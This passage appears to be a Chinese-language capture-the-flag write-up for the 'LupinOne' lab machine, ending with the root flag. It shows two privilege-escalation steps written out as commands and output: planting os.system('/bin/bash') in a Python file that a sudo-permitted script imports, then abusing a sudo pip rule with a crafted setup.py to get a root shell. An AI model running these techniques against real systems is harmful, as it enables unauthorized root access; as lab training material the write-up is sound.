用vi修改这个文件加入 import os; os.system("/bin/bash")
然后执行heist.py文件
icex64@LupinOne:/home/arsene$ sudo -l
Matching Defaults entries for icex64 on LupinOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User icex64 may run the following commands on LupinOne:
(arsene) NOPASSWD: /usr/bin/python3.9 /home/arsene/heist.py
icex64@LupinOne:/home/arsene$ sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py
arsene@LupinOne:~$ id
uid=1000(arsene) gid=1000(arsene) groups=1000(arsene),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
arsene@LupinOne:~$
成功切换到用户arsene
arsene@LupinOne:~$ sudo -l
Matching Defaults entries for arsene on LupinOne:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User arsene may run the following commands on LupinOne:
(root) NOPASSWD: /usr/bin/pip
arsene@LupinOne:~$
arsene@LupinOne:~$ TF=$(mktemp -d)
arsene@LupinOne:~$ echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
arsene@LupinOne:~$ sudo pip install $TF
Processing /tmp/tmp.BkO0AowD5p
id#
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -alh
total 36K
drwx------ 4 root root 4.0K Oct 7 2021 .
drwxr-xr-x 18 root root 4.0K Oct 4 2021 ..
-rw------- 1 root root 234 Oct 7 2021 .bash_history
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwxr-xr-x 3 root root 4.0K Oct 4 2021 .local
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
-rw------- 1 root root 12 Oct 4 2021 .python_history
-rw-r--r-- 1 root root 3.3K Oct 4 2021 root.txt
drwx------ 2 root root 4.0K Oct 4 2021 .ssh
# cat root.txt
*,,,,,,,,,,,,,,,,,,,,,,,,,,,,,(((((((((((((((((((((,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
, .&&&&&&&&&( /&&&&&&&&&
, &&&&&&* @&&&&&&
, *&&&&& &&&&&&
, &&&&& &&&&&.
, &&&& ./#%@@&#, &&&&*
, &%&& &&&&&&&&&&&**,**/&&(&&&&&&&& &&&&
, &@(& &&&&&&&&&&&&&&&.....,&&*&&&&&&&&&& &&&&
, .& & &&&&&&&&&&&&&&& &&.&&&&&&&&&& &%&
, @& & &&&&&&&&&&&&&&& && &&&&&&&&&& @&&&
, &%(( &&&&&&&&&&&&&&& && &&&&&&&&&& #&&&
, &#/* &&&&&&&&&&&&&&& && #&&&&&&&&&( (&&&
, %@ & &&&&&&&&&&&&&&& && ,&&&&&&&&&& /*&/
, & & &&&&&&&&&&&&&&& &&* &&&&&&&&&& & &
, & & &&&&&&&&&&&&&&&, &&& &&&&&&&&&&( &,@
,.& # #&&&&&&&&&&&&&&( &&&.&&&&&&&&&&& & &
*& & ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &(&
*& & ,&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& & &
*& * &&&&&&&&&&&&&&&&&&&@. &&&&&&&& @ &
*& &&&&&&&&&&&&&&&&&&@ &&&&&/ &&&&&& & &
*% . &&&&&&&&&&&@&&&&&&& & &&( #&&&& &&&&. % &
*& * &&&&&&&&&& /* @%&%&&&&&&&& &&&&, @ &
*& & &&&&&&& & &&&&&&&&&& @&&& & &
*& & &&&&& / /&&&& &&& & @
*/(, && & / &.
* & & &&& # &&&&&& @ & &.
* .% & &&&%& & @&&&&&&&&&. %@&&* ( @,
/ & % .&&&& &@ @ &/ @ &
* & @ &&&&&& &&. , & &
* & & &&&&&&&&&& & &&&( & & &
, & % &&&&&&&&&&&&&&&( .&&&&&&& & & &
, & .. &&&&&&&&&&&&&&&&&&&&&&&&&&&&* & & & &
, #& & &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &. % &
, & , &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&. &&&& @ &*
, & ,, &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&. /&&&&&&&& & &@
, & & #&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& &&&&&&&@ &. &&
, && /# /&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&# &&&# &# #&
, && &( .&&&&&&&&&&&&&&&&&&&&&&&&&&& && &&
/ ,&&( &&% *&&&&&&&&&&% .&&& /&&,
, &&&&&/... .#&&&&#
3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}
See you on the next heist.
#
成功提权。